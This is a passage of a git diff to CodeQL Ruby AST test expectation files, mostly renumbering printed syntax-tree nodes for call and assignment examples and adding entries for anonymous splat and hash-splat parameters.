281| getReceiver: [ConstantReadAccess] X +# 286| getStmt: [ClassDeclaration] MyClass +# 287| getStmt: [Method] my_method # 288| getStmt: [SuperCall] super call to my_method -# 288| getArgument: [StringLiteral] "blah" -# 288| getComponent: [StringTextComponent] blah # 289| getStmt: [SuperCall] super call to my_method -# 289| getArgument: [IntegerLiteral] 1 -# 289| getArgument: [IntegerLiteral] 2 -# 289| getArgument: [IntegerLiteral] 3 # 290| getStmt: [SuperCall] super call to my_method -# 290| getBlock: [BraceBlock] { ... } -# 290| getParameter: [SimpleParameter] x -# 290| getDefiningAccess: [LocalVariableAccess] x -# 290| getStmt: [AddExpr] ... + ... -# 290| getAnOperand/getLeftOperand/getReceiver: [LocalVariableAccess] x -# 290| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 +# 290| getArgument: [StringLiteral] "blah" +# 290| getComponent: [StringTextComponent] blah # 291| getStmt: [SuperCall] super call to my_method -# 291| getBlock: [DoBlock] do ... end -# 291| getParameter: [SimpleParameter] x -# 291| getDefiningAccess: [LocalVariableAccess] x -# 291| getStmt: [MulExpr] ... * ... -# 291| getAnOperand/getLeftOperand/getReceiver: [LocalVariableAccess] x -# 291| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 2 +# 291| getArgument: [IntegerLiteral] 1 +# 291| getArgument: [IntegerLiteral] 2 +# 291| getArgument: [IntegerLiteral] 3 # 292| getStmt: [SuperCall] super call to my_method -# 292| getArgument: [IntegerLiteral] 4 -# 292| getArgument: [IntegerLiteral] 5 # 292| getBlock: [BraceBlock] { ... } # 292| getParameter: [SimpleParameter] x # 292| getDefiningAccess: [LocalVariableAccess] x # 292| getStmt: [AddExpr] ... + ... # 292| getAnOperand/getLeftOperand/getReceiver: [LocalVariableAccess] x -# 292| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 100 +# 292| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 # 293| getStmt: [SuperCall] super call to my_method -# 293| getArgument: [IntegerLiteral] 6 -# 293| getArgument: [IntegerLiteral] 7 # 293| getBlock: [DoBlock] do ... end # 293| getParameter: [SimpleParameter] x # 293| getDefiningAccess: [LocalVariableAccess] x -# 293| getStmt: [AddExpr] ... + ... +# 293| getStmt: [MulExpr] ... * ... # 293| getAnOperand/getLeftOperand/getReceiver: [LocalVariableAccess] x -# 293| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 200 -# 301| getStmt: [ClassDeclaration] AnotherClass -# 302| getStmt: [Method] another_method -# 303| getStmt: [MethodCall] call to super -# 303| getReceiver: [MethodCall] call to foo -# 303| getReceiver: [SelfVariableAccess] self -# 304| getStmt: [MethodCall] call to super -# 304| getReceiver: [SelfVariableAccess] self +# 293| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 2 +# 294| getStmt: [SuperCall] super call to my_method +# 294| getArgument: [IntegerLiteral] 4 +# 294| getArgument: [IntegerLiteral] 5 +# 294| getBlock: [BraceBlock] { ... } +# 294| getParameter: [SimpleParameter] x +# 294| getDefiningAccess: [LocalVariableAccess] x +# 294| getStmt: [AddExpr] ... + ... +# 294| getAnOperand/getLeftOperand/getReceiver: [LocalVariableAccess] x +# 294| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 100 +# 295| getStmt: [SuperCall] super call to my_method +# 295| getArgument: [IntegerLiteral] 6 +# 295| getArgument: [IntegerLiteral] 7 +# 295| getBlock: [DoBlock] do ... end +# 295| getParameter: [SimpleParameter] x +# 295| getDefiningAccess: [LocalVariableAccess] x +# 295| getStmt: [AddExpr] ... + ... +# 295| getAnOperand/getLeftOperand/getReceiver: [LocalVariableAccess] x +# 295| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 200 +# 303| getStmt: [ClassDeclaration] AnotherClass +# 304| getStmt: [Method] another_method # 305| getStmt: [MethodCall] call to super -# 305| getReceiver: [SuperCall] super call to another_method -# 310| getStmt: [MethodCall] call to call -# 310| getReceiver: [MethodCall] call to foo -# 310| getReceiver: [SelfVariableAccess] self -# 311| getStmt: [MethodCall] call to call -# 311| getReceiver: [MethodCall] call to foo -# 311| getReceiver: [SelfVariableAccess] self -# 311| getArgument: [IntegerLiteral] 1 -# 314| getStmt: [AssignExpr] ... = ... -# 314| getAnOperand/getLeftOperand: [MethodCall] call to foo -# 314| getReceiver: [SelfVariableAccess] self -# 314| getAnOperand/getRightOperand: [IntegerLiteral] 10 -# 315| getStmt: [AssignExpr] ... = ... -# 315| getAnOperand/getLeftOperand: [ElementReference] ...[...] -# 315| getReceiver: [MethodCall] call to foo -# 315| getReceiver: [SelfVariableAccess] self -# 315| getArgument: [IntegerLiteral] 0 -# 315| getAnOperand/getRightOperand: [IntegerLiteral] 10 +# 305| getReceiver: [MethodCall] call to foo +# 305| getReceiver: [SelfVariableAccess] self +# 306| getStmt: [MethodCall] call to super +# 306| getReceiver: [SelfVariableAccess] self +# 307| getStmt: [MethodCall] call to super +# 307| getReceiver: [SuperCall] super call to another_method +# 312| getStmt: [MethodCall] call to call +# 312| getReceiver: [MethodCall] call to foo +# 312| getReceiver: [SelfVariableAccess] self +# 313| getStmt: [MethodCall] call to call +# 313| getReceiver: [MethodCall] call to foo +# 313| getReceiver: [SelfVariableAccess] self +# 313| getArgument: [IntegerLiteral] 1 # 316| getStmt: [AssignExpr] ... = ... -# 316| getAnOperand/getLeftOperand: [DestructuredLhsExpr] (..., ...) -# 316| getElement: [MethodCall] call to foo -# 316| getReceiver: [SelfVariableAccess] self -# 316| getElement: [MethodCall] call to bar -# 316| getReceiver: [SelfVariableAccess] self -# 316| getElement: [ElementReference] ...[...] -# 316| getReceiver: [MethodCall] call to foo -# 316| getReceiver: [SelfVariableAccess] self -# 316| getArgument: [IntegerLiteral] 4 -# 316| getAnOperand/getRightOperand: [ArrayLiteral] [...] -# 316| getElement: [IntegerLiteral] 1 -# 316| getElement: [IntegerLiteral] 2 -# 316| getElement: [IntegerLiteral] 3 -# 316| getElement: [IntegerLiteral] 4 +# 316| getAnOperand/getLeftOperand: [MethodCall] call to foo +# 316| getReceiver: [SelfVariableAccess] self +# 316| getAnOperand/getRightOperand: [IntegerLiteral] 10 # 317| getStmt: [AssignExpr] ... = ... -# 317| getAnOperand/getLeftOperand: [DestructuredLhsExpr] (..., ...) -# 317| getElement: [LocalVariableAccess] a -# 317| getElement: [ElementReference] ...[...] -# 317| getReceiver: [MethodCall] call to foo -# 317| getReceiver: [SelfVariableAccess] self -# 317| getArgument: [IntegerLiteral] 5 -# 317| getAnOperand/getRightOperand: [ArrayLiteral] [...] -# 317| getElement: [IntegerLiteral] 1 -# 317| getElement: [IntegerLiteral] 2 -# 317| getElement: [IntegerLiteral] 3 -# 318| getStmt: [AssignAddExpr] ... += ... -# 318| getAnOperand/getLeftOperand: [MethodCall] call to count -# 318| getReceiver: [SelfVariableAccess] self -# 318| getAnOperand/getRightOperand: [IntegerLiteral] 1 -# 319| getStmt: [AssignAddExpr] ... += ... -# 319| getAnOperand/getLeftOperand: [ElementReference] ...[...] -# 319| getReceiver: [MethodCall] call to foo -# 319| getReceiver: [SelfVariableAccess] self -# 319| getArgument: [IntegerLiteral] 0 -# 319| getAnOperand/getRightOperand: [IntegerLiteral] 1 -# 320| getStmt: [AssignMulExpr] ... *= ... -# 320| getAnOperand/getLeftOperand: [ElementReference] ...[...] -# 320| getReceiver: [MethodCall] call to bar -# 320| getReceiver: [MethodCall] call to foo -# 320| getReceiver: [SelfVariableAccess] self -# 320| getArgument: [IntegerLiteral] 0 -# 320| getArgument: [MethodCall] call to baz -# 320| getReceiver: [MethodCall] call to foo -# 320| getReceiver: [SelfVariableAccess] self -# 320| getArgument: [AddExpr] ... + ... -# 320| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to boo -# 320| getReceiver: [MethodCall] call to foo -# 320| getReceiver: [SelfVariableAccess] self -# 320| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 -# 320| getAnOperand/getRightOperand: [IntegerLiteral] 2 -# 323| getStmt: [Method] foo -# 323| getStmt: [MethodCall] call to bar -# 323| getReceiver: [SelfVariableAccess] self -# 324| getStmt: [Method] foo -# 324| getStmt: [MethodCall] call to bar -# 324| getReceiver: [SelfVariableAccess] self +# 317| getAnOperand/getLeftOperand: [ElementReference] ...[...] +# 317| getReceiver: [MethodCall] call to foo +# 317| getReceiver: [SelfVariableAccess] self +# 317| getArgument: [IntegerLiteral] 0 +# 317| getAnOperand/getRightOperand: [IntegerLiteral] 10 +# 318| getStmt: [AssignExpr] ... = ... +# 318| getAnOperand/getLeftOperand: [DestructuredLhsExpr] (..., ...) +# 318| getElement: [MethodCall] call to foo +# 318| getReceiver: [SelfVariableAccess] self +# 318| getElement: [MethodCall] call to bar +# 318| getReceiver: [SelfVariableAccess] self +# 318| getElement: [ElementReference] ...[...] +# 318| getReceiver: [MethodCall] call to foo +# 318| getReceiver: [SelfVariableAccess] self +# 318| getArgument: [IntegerLiteral] 4 +# 318| getAnOperand/getRightOperand: [ArrayLiteral] [...] +# 318| getElement: [IntegerLiteral] 1 +# 318| getElement: [IntegerLiteral] 2 +# 318| getElement: [IntegerLiteral] 3 +# 318| getElement: [IntegerLiteral] 4 +# 319| getStmt: [AssignExpr] ... = ... +# 319| getAnOperand/getLeftOperand: [DestructuredLhsExpr] (..., ...) +# 319| getElement: [LocalVariableAccess] a +# 319| getElement: [ElementReference] ...[...] +# 319| getReceiver: [MethodCall] call to foo +# 319| getReceiver: [SelfVariableAccess] self +# 319| getArgument: [IntegerLiteral] 5 +# 319| getAnOperand/getRightOperand: [ArrayLiteral] [...] +# 319| getElement: [IntegerLiteral] 1 +# 319| getElement: [IntegerLiteral] 2 +# 319| getElement: [IntegerLiteral] 3 +# 320| getStmt: [AssignAddExpr] ... += ... +# 320| getAnOperand/getLeftOperand: [MethodCall] call to count +# 320| getReceiver: [SelfVariableAccess] self +# 320| getAnOperand/getRightOperand: [IntegerLiteral] 1 +# 321| getStmt: [AssignAddExpr] ... += ... +# 321| getAnOperand/getLeftOperand: [ElementReference] ...[...] +# 321| getReceiver: [MethodCall] call to foo +# 321| getReceiver: [SelfVariableAccess] self +# 321| getArgument: [IntegerLiteral] 0 +# 321| getAnOperand/getRightOperand: [IntegerLiteral] 1 +# 322| getStmt: [AssignMulExpr] ... *= ... +# 322| getAnOperand/getLeftOperand: [ElementReference] ...[...] +# 322| getReceiver: [MethodCall] call to bar +# 322| getReceiver: [MethodCall] call to foo +# 322| getReceiver: [SelfVariableAccess] self +# 322| getArgument: [IntegerLiteral] 0 +# 322| getArgument: [MethodCall] call to baz +# 322| getReceiver: [MethodCall] call to foo +# 322| getReceiver: [SelfVariableAccess] self +# 322| getArgument: [AddExpr] ... + ... +# 322| getAnOperand/getLeftOperand/getReceiver: [MethodCall] call to boo +# 322| getReceiver: [MethodCall] call to foo +# 322| getReceiver: [SelfVariableAccess] self +# 322| getAnOperand/getArgument/getRightOperand: [IntegerLiteral] 1 +# 322| getAnOperand/getRightOperand: [IntegerLiteral] 2 # 325| getStmt: [Method] foo -# 325| getParameter: [SimpleParameter] x -# 325| getDefiningAccess: [LocalVariableAccess] x # 325| getStmt: [MethodCall] call to bar # 325| getReceiver: [SelfVariableAccess] self -# 326| getStmt: [SingletonMethod] foo -# 326| getObject: [ConstantReadAccess] Object +# 326| getStmt: [Method] foo # 326| getStmt: [MethodCall] call to bar # 326| getReceiver: [SelfVariableAccess] self -# 327| getStmt: [SingletonMethod] foo -# 327| getObject: [ConstantReadAccess] Object +# 327| getStmt: [Method] foo # 327| getParameter: [SimpleParameter] x # 327| getDefiningAccess: [LocalVariableAccess] x # 327| getStmt: [MethodCall] call to bar # 327| getReceiver: [SelfVariableAccess] self -# 328| getStmt: [Method] foo -# 328| getStmt: [RescueModifierExpr] ... rescue ... -# 328| getBody: [MethodCall] call to bar -# 328| getReceiver: [SelfVariableAccess] self -# 328| getHandler: [ParenthesizedExpr] ( ... ) -# 328| getStmt: [MethodCall] call to print -# 328| getReceiver: [SelfVariableAccess] self -# 328| getArgument: [StringLiteral] "error" -# 328| getComponent: [StringTextComponent] error -# 331| getStmt: [Method] foo -# 331| getParameter: [ForwardParameter] ... -# 332| getStmt: [SuperCall] super call to foo -# 332| getArgument: [ForwardedArguments] ... -# 335| getStmt: [Method] foo -# 335| getParameter: [SimpleParameter] a -# 335| getDefiningAccess: [LocalVariableAccess] a -# 335| getParameter: [SimpleParameter] b -# 335| getDefiningAccess: [LocalVariableAccess] b -# 335| getParameter: [ForwardParameter] ... -# 336| getStmt: [MethodCall] call to bar -# 336| getReceiver: [SelfVariableAccess] self -# 336| getArgument: [LocalVariableAccess] b -# 336| getArgument: [ForwardedArguments] ... -# 340| getStmt: [ForExpr] for ... in ... -# 340| getPattern: [DestructuredLhsExpr] (..., ...) -# 340| getElement: [LocalVariableAccess] x -# 340| getElement: [LocalVariableAccess] y -# 340| getElement: [LocalVariableAccess] z -# 340| getValue: [ArrayLiteral] [...] -# 340| getElement: [ArrayLiteral] [...] -# 340| getElement: [IntegerLiteral] 1 -# 340| getElement: [IntegerLiteral] 2 -# 340| getElement: [IntegerLiteral] 3 -# 340| getElement: [ArrayLiteral] [...] -# 340| getElement: [IntegerLiteral] 4 -# 340| getElement: [IntegerLiteral] 5 -# 340| getElement: [IntegerLiteral] 6 -# 340| getBody: [StmtSequence] do ... -# 341| getStmt: [MethodCall] call to foo -# 341| getReceiver: [SelfVariableAccess] self -# 341| getArgument: [LocalVariableAccess] x -# 341| getArgument: [LocalVariableAccess] y -# 341| getArgument: [LocalVariableAccess] z -# 344| getStmt: [MethodCall] call to foo -# 344| getReceiver: [SelfVariableAccess] self -# 344| getArgument: [Pair] Pair -# 344| getKey: [SymbolLiteral] :x -# 344| getComponent: [StringTextComponent] x -# 344| getValue: [IntegerLiteral] 42 -# 345| getStmt: [MethodCall] call to foo -# 345| getReceiver: [SelfVariableAccess] self -# 345| getArgument: [Pair] Pair -# 345| getKey: [SymbolLiteral] :x -# 345| getComponent: [StringTextComponent] x -# 345| getValue: [LocalVariableAccess] x -# 345| getArgument: [Pair] Pair -# 345| getKey: [SymbolLiteral] :novar -# 345| getComponent: [StringTextComponent] novar -# 345| getValue: [MethodCall] call to novar +# 328| getStmt: [SingletonMethod] foo +# 328| getObject: [ConstantReadAccess] Object +# 328| getStmt: [MethodCall] call to bar +# 328| getReceiver: [SelfVariableAccess] self +# 329| getStmt: [SingletonMethod] foo +# 329| getObject: [ConstantReadAccess] Object +# 329| getParameter: [SimpleParameter] x +# 329| getDefiningAccess: [LocalVariableAccess] x +# 329| getStmt: [MethodCall] call to bar +# 329| getReceiver: [SelfVariableAccess] self +# 330| getStmt: [Method] foo +# 330| getStmt: [RescueModifierExpr] ... rescue ... +# 330| getBody: [MethodCall] call to bar +# 330| getReceiver: [SelfVariableAccess] self +# 330| getHandler: [ParenthesizedExpr] ( ... ) +# 330| getStmt: [MethodCall] call to print +# 330| getReceiver: [SelfVariableAccess] self +# 330| getArgument: [StringLiteral] "error" +# 330| getComponent: [StringTextComponent] error +# 333| getStmt: [Method] foo +# 333| getParameter: [ForwardParameter] ... +# 334| getStmt: [SuperCall] super call to foo +# 334| getArgument: [ForwardedArguments] ... +# 337| getStmt: [Method] foo +# 337| getParameter: [SimpleParameter] a +# 337| getDefiningAccess: [LocalVariableAccess] a +# 337| getParameter: [SimpleParameter] b +# 337| getDefiningAccess: [LocalVariableAccess] b +# 337| getParameter: [ForwardParameter] ... +# 338| getStmt: [MethodCall] call to bar +# 338| getReceiver: [SelfVariableAccess] self +# 338| getArgument: [LocalVariableAccess] b +# 338| getArgument: [ForwardedArguments] ... +# 342| getStmt: [ForExpr] for ... in ... +# 342| getPattern: [DestructuredLhsExpr] (..., ...) +# 342| getElement: [LocalVariableAccess] x +# 342| getElement: [LocalVariableAccess] y +# 342| getElement: [LocalVariableAccess] z +# 342| getValue: [ArrayLiteral] [...] +# 342| getElement: [ArrayLiteral] [...] +# 342| getElement: [IntegerLiteral] 1 +# 342| getElement: [IntegerLiteral] 2 +# 342| getElement: [IntegerLiteral] 3 +# 342| getElement: [ArrayLiteral] [...] +# 342| getElement: [IntegerLiteral] 4 +# 342| getElement: [IntegerLiteral] 5 +# 342| getElement: [IntegerLiteral] 6 +# 342| getBody: [StmtSequence] do ... +# 343| getStmt: [MethodCall] call to foo +# 343| getReceiver: [SelfVariableAccess] self +# 343| getArgument: [LocalVariableAccess] x +# 343| getArgument: [LocalVariableAccess] y +# 343| getArgument: [LocalVariableAccess] z # 346| getStmt: [MethodCall] call to foo # 346| getReceiver: [SelfVariableAccess] self # 346| getArgument: [Pair] Pair -# 346| getKey: [SymbolLiteral] :X -# 346| getComponent: [StringTextComponent] X +# 346| getKey: [SymbolLiteral] :x +# 346| getComponent: [StringTextComponent] x # 346| getValue: [IntegerLiteral] 42 # 347| getStmt: [MethodCall] call to foo # 347| getReceiver: [SelfVariableAccess] self # 347| getArgument: [Pair] Pair -# 347| getKey: [SymbolLiteral] :X -# 347| getComponent: [StringTextComponent] X -# 347| getValue: [ConstantReadAccess] X -# 350| getStmt: [AssignExpr] ... = ... -# 350| getAnOperand/getLeftOperand: [LocalVariableAccess] y -# 350| getAnOperand/getRightOperand: [IntegerLiteral] 1 -# 351| getStmt: [AssignExpr] ... = ... -# 351| getAnOperand/getLeftOperand: [LocalVariableAccess] one -# 351| getAnOperand/getRightOperand: [Lambda] -> { ... } -# 351| getParameter: [SimpleParameter] x -# 351| getDefiningAccess: [LocalVariableAccess] x -# 351| getStmt: [LocalVariableAccess] y +# 347| getKey: [SymbolLiteral] :x +# 347| getComponent: [StringTextComponent] x +# 347| getValue: [LocalVariableAccess] x +# 347| getArgument: [Pair] Pair +# 347| getKey: [SymbolLiteral] :novar +# 347| getComponent: [StringTextComponent] novar +# 347| getValue: [MethodCall] call to novar +# 348| getStmt: [MethodCall] call to foo +# 348| getReceiver: [SelfVariableAccess] self +# 348| getArgument: [Pair] Pair +# 348| getKey: [SymbolLiteral] :X +# 348| getComponent: [StringTextComponent] X +# 348| getValue: [IntegerLiteral] 42 +# 349| getStmt: [MethodCall] call to foo +# 349| getReceiver: [SelfVariableAccess] self +# 349| getArgument: [Pair] Pair +# 349| getKey: [SymbolLiteral] :X +# 349| getComponent: [StringTextComponent] X +# 349| getValue: [ConstantReadAccess] X # 352| getStmt: [AssignExpr] ... = ... -# 352| getAnOperand/getLeftOperand: [LocalVariableAccess] f -# 352| getAnOperand/getRightOperand: [Lambda] -> { ... } -# 352| getParameter: [SimpleParameter] x -# 352| getDefiningAccess: [LocalVariableAccess] x -# 352| getStmt: [MethodCall] call to foo -# 352| getReceiver: [SelfVariableAccess] self -# 352| getArgument: [LocalVariableAccess] x +# 352| getAnOperand/getLeftOperand: [LocalVariableAccess] y +# 352| getAnOperand/getRightOperand: [IntegerLiteral] 1 # 353| getStmt: [AssignExpr] ... = ... -# 353| getAnOperand/getLeftOperand: [LocalVariableAccess] g +# 353| getAnOperand/getLeftOperand: [LocalVariableAccess] one # 353| getAnOperand/getRightOperand: [Lambda] -> { ... } # 353| getParameter: [SimpleParameter] x # 353| getDefiningAccess: [LocalVariableAccess] x -# 353| getStmt: [MethodCall] call to unknown_call -# 353| getReceiver: [SelfVariableAccess] self +# 353| getStmt: [LocalVariableAccess] y # 354| getStmt: [AssignExpr] ... = ... -# 354| getAnOperand/getLeftOperand: [LocalVariableAccess] h +# 354| getAnOperand/getLeftOperand: [LocalVariableAccess] f # 354| getAnOperand/getRightOperand: [Lambda] -> { ... } # 354| getParameter: [SimpleParameter] x # 354| getDefiningAccess: [LocalVariableAccess] x -# 355| getStmt: [LocalVariableAccess] x -# 356| getStmt: [LocalVariableAccess] y -# 357| getStmt: [MethodCall] call to unknown_call -# 357| getReceiver: [SelfVariableAccess] self -# 361| getStmt: [MethodCall] call to empty? -# 361| getReceiver: [MethodCall] call to list -# 361| getReceiver: [SelfVariableAccess] self -# 362| getStmt: [MethodCall] call to empty? -# 362| getReceiver: [MethodCall] call to list -# 362| getReceiver: [SelfVariableAccess] self +# 354| getStmt: [MethodCall] call to foo +# 354| getReceiver: [SelfVariableAccess] self +# 354| getArgument: [LocalVariableAccess] x +# 355| getStmt: [AssignExpr] ... = ... +# 355| getAnOperand/getLeftOperand: [LocalVariableAccess] g +# 355| getAnOperand/getRightOperand: [Lambda] -> { ... } +# 355| getParameter: [SimpleParameter] x +# 355| getDefiningAccess: [LocalVariableAccess] x +# 355| getStmt: [MethodCall] call to unknown_call +# 355| getReceiver: [SelfVariableAccess] self +# 356| getStmt: [AssignExpr] ... = ... +# 356| getAnOperand/getLeftOperand: [LocalVariableAccess] h +# 356| getAnOperand/getRightOperand: [Lambda] -> { ... } +# 356| getParameter: [SimpleParameter] x +# 356| getDefiningAccess: [LocalVariableAccess] x +# 357| getStmt: [LocalVariableAccess] x +# 358| getStmt: [LocalVariableAccess] y +# 359| getStmt: [MethodCall] call to unknown_call +# 359| getReceiver: [SelfVariableAccess] self # 363| getStmt: [MethodCall] call to empty? # 363| getReceiver: [MethodCall] call to list # 363| getReceiver: [SelfVariableAccess] self -# 364| getStmt: [MethodCall] call to bar -# 364| getReceiver: [MethodCall] call to foo +# 364| getStmt: [MethodCall] call to empty? +# 364| getReceiver: [MethodCall] call to list # 364| getReceiver: [SelfVariableAccess] self -# 364| getArgument: [IntegerLiteral] 1 -# 364| getArgument: [IntegerLiteral] 2 -# 364| getBlock: [BraceBlock] { ... } -# 364| getParameter: [SimpleParameter] x -# 364| getDefiningAccess: [LocalVariableAccess] x -# 364| getStmt: [LocalVariableAccess] x +# 365| getStmt: [MethodCall] call to empty? +# 365| getReceiver: [MethodCall] call to list +# 365| getReceiver: [SelfVariableAccess] self +# 366| getStmt: [MethodCall] call to bar +# 366| getReceiver: [MethodCall] call to foo +# 366| getReceiver: [SelfVariableAccess] self +# 366| getArgument: [IntegerLiteral] 1 +# 366| getArgument: [IntegerLiteral] 2 +# 366| getBlock: [BraceBlock] { ... } +# 366| getParameter: [SimpleParameter] x +# 366| getDefiningAccess: [LocalVariableAccess] x +# 366| getStmt: [LocalVariableAccess] x control/cases.rb: # 1| [Toplevel] cases.rb # 2| getStmt: [AssignExpr] ... = ... @@ -3089,6 +3095,24 @@ params/params.rb: # 86| getStmt: [MethodCall] call to puts # 86| getReceiver: [SelfVariableAccess] self # 86| getArgument: [LocalVariableAccess] x +# 89| getStmt: [Method] anonymous_splat_parameter +# 89| getParameter: [SimpleParameter] array +# 89| getDefiningAccess: [LocalVariableAccess] array +# 89| getParameter: [SplatParameter] * +# 89| getDefiningAccess: [LocalVariableAccess] __synth__0 +# 90| getStmt: [MethodCall] call to concat +# 90| getReceiver: [LocalVariableAccess] array +# 90| getArgument: [SplatExpr] * ... +# 90| getAnOperand/getOperand/getReceiver: [LocalVariableAccess] __synth__0 +# 94| getStmt: [Method] anonymous_hash_splat_parameter +# 94| getParameter: [SimpleParameter] hash +# 94| getDefiningAccess: [LocalVariableAccess] hash +# 94| getParameter: [HashSplatParameter] ** +# 94| getDefiningAccess: [LocalVariableAccess] __synth__0 +# 95| getStmt: [MethodCall] call to merge +# 95| getReceiver: [LocalVariableAccess] hash +# 95| getArgument: [HashSplatExpr] ** ... +# 95| getAnOperand/getOperand/getReceiver: [LocalVariableAccess] __synth__0 erb/template.html.erb: # 19| [Toplevel] template.html.erb # 19| getStmt: [StringLiteral] "hello world" diff --git a/ruby/ql/test/library-tests/ast/AstDesugar.expected b/ruby/ql/test/library-tests/ast/AstDesugar.expected index 45711cd2927..7bf8fae320e 100644 --- a/ruby/ql/test/library-tests/ast/AstDesugar.expected +++ b/ruby/ql/test/library-tests/ast/AstDesugar.expected @@ -60,257 +60,257 @@ calls/calls.rb: # 249| getReceiver: [ConstantReadAccess] X # 249| getValue: [MethodCall] call to bar # 249| getReceiver: [ConstantReadAccess] X -# 314| [AssignExpr] ... = ... -# 314| getDesugared: [StmtSequence] ... -# 314| getStmt: [SetterMethodCall] call to foo= -# 314| getReceiver: [SelfVariableAccess] self -# 314| getArgument: [AssignExpr] ... = ... -# 314| getAnOperand/getRightOperand: [IntegerLiteral] 10 -# 314| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 -# 314| getStmt: [LocalVariableAccess] __synth__0 -# 315| [AssignExpr] ... = ... -# 315| getDesugared: [StmtSequence] ... -# 315| getStmt: [SetterMethodCall] call to []= -# 315| getReceiver: [MethodCall] call to foo -# 315| getReceiver: [SelfVariableAccess] self -# 315| getArgument: [IntegerLiteral] 0 -# 315| getArgument: [AssignExpr] ... = ... -# 315| getAnOperand/getRightOperand: [IntegerLiteral] 10 -# 315| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 -# 315| getStmt: [LocalVariableAccess] __synth__0 # 316| [AssignExpr] ... = ... # 316| getDesugared: [StmtSequence] ... -# 316| getStmt: [AssignExpr] ... = ... -# 316| getAnOperand/getLeftOperand: [MethodCall] call to foo -# 316| getDesugared: [StmtSequence] ... -# 316| getStmt: [SetterMethodCall] call to foo= -# 316| getReceiver: [SelfVariableAccess] self -# 316| getArgument: [AssignExpr] ... = ... -# 316| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 -# 316| getAnOperand/getRightOperand: [MethodCall] call to [] -# 316| getReceiver: [LocalVariableAccess] __synth__0 -# 316| getArgument: [IntegerLiteral] 0 -# 316| getStmt: [LocalVariableAccess] __synth__0__1 -# 316| getStmt: [AssignExpr] ... = ... -# 316| getAnOperand/getLeftOperand: [MethodCall] call to bar -# 316| getDesugared: [StmtSequence] ... -# 316| getStmt: [SetterMethodCall] call to bar= -# 316| getReceiver: [SelfVariableAccess] self -# 316| getArgument: [AssignExpr] ... = ... -# 316| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 -# 316| getAnOperand/getRightOperand: [MethodCall] call to [] -# 316| getReceiver: [LocalVariableAccess] __synth__0 -# 316| getArgument: [RangeLiteral] _ .. _ -# 316| getBegin: [IntegerLiteral] 1 -# 316| getEnd: [IntegerLiteral] -2 -# 316| getStmt: [LocalVariableAccess] __synth__0__1 -# 316| getStmt: [AssignExpr] ... = ... -# 316| getAnOperand/getLeftOperand: [ElementReference] ...[...] -# 316| getDesugared: [StmtSequence] ... -# 316| getStmt: [SetterMethodCall] call to []= -# 316| getReceiver: [MethodCall] call to foo -# 316| getReceiver: [SelfVariableAccess] self -# 316| getArgument: [AssignExpr] ... = ... -# 316| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 -# 316| getAnOperand/getRightOperand: [MethodCall] call to [] -# 316| getReceiver: [LocalVariableAccess] __synth__0 -# 316| getArgument: [IntegerLiteral] -1 -# 316| getArgument: [IntegerLiteral] 4 -# 316| getStmt: [LocalVariableAccess] __synth__0__1 -# 316| getStmt: [AssignExpr] ... = ... -# 316| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 -# 316| getAnOperand/getRightOperand: [SplatExpr] * ... -# 316| getAnOperand/getOperand/getReceiver: [ArrayLiteral] [...] -# 316| getDesugared: [MethodCall] call to [] -# 316| getReceiver: [ConstantReadAccess] Array -# 316| getArgument: [IntegerLiteral] 1 -# 316| getArgument: [IntegerLiteral] 2 -# 316| getArgument: [IntegerLiteral] 3 -# 316| getArgument: [IntegerLiteral] 4 +# 316| getStmt: [SetterMethodCall] call to foo= +# 316| getReceiver: [SelfVariableAccess] self +# 316| getArgument: [AssignExpr] ... = ... +# 316| getAnOperand/getRightOperand: [IntegerLiteral] 10 +# 316| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 +# 316| getStmt: [LocalVariableAccess] __synth__0 # 317| [AssignExpr] ... = ... # 317| getDesugared: [StmtSequence] ... -# 317| getStmt: [AssignExpr] ... = ... -# 317| getAnOperand/getLeftOperand: [LocalVariableAccess] a -# 317| getAnOperand/getRightOperand: [MethodCall] call to [] -# 317| getReceiver: [LocalVariableAccess] __synth__0 -# 317| getArgument: [IntegerLiteral] 0 -# 317| getStmt: [AssignExpr] ... = ... -# 317| getAnOperand/getLeftOperand: [ElementReference] ...[...] -# 317| getDesugared: [StmtSequence] ... -# 317| getStmt: [SetterMethodCall] call to []= -# 317| getReceiver: [MethodCall] call to foo -# 317| getReceiver: [SelfVariableAccess] self -# 317| getArgument: [AssignExpr] ... = ... -# 317| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0__1 -# 317| getAnOperand/getRightOperand: [MethodCall] call to [] -# 317| getReceiver: [LocalVariableAccess] __synth__0 -# 317| getArgument: [RangeLiteral] _ .. _ -# 317| getBegin: [IntegerLiteral] 1 -# 317| getEnd: [IntegerLiteral] -1 -# 317| getArgument: [IntegerLiteral] 5 -# 317| getStmt: [LocalVariableAccess] __synth__0__1 -# 317| getStmt: [AssignExpr] ... = ... -# 317| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 -# 317| getAnOperand/getRightOperand: [SplatExpr] * ... -# 317| getAnOperand/getOperand/getReceiver: [ArrayLiteral] [...] -# 317| getDesugared: [MethodCall] call to [] -# 317| getReceiver: [ConstantReadAccess] Array -# 317| getArgument: [IntegerLiteral] 1 -# 317| getArgument: [IntegerLiteral] 2 -# 317| getArgument: [IntegerLiteral] 3 -# 318| [AssignAddExpr] ... += ... +# 317| getStmt: [SetterMethodCall] call to []= +# 317| getReceiver: [MethodCall] call to foo +# 317| getReceiver: [SelfVariableAccess] self +# 317| getArgument: [IntegerLiteral] 0 +# 317| getArgument: [AssignExpr] ... = ... +# 317| getAnOperand/getRightOperand: [IntegerLiteral] 10 +# 317| getAnOperand/getLeftOperand: [LocalVariableAccess] __synth__0 +# 317| getStmt: [LocalVariableAccess] __synth__0 +# 318| [AssignExpr] ... = ... 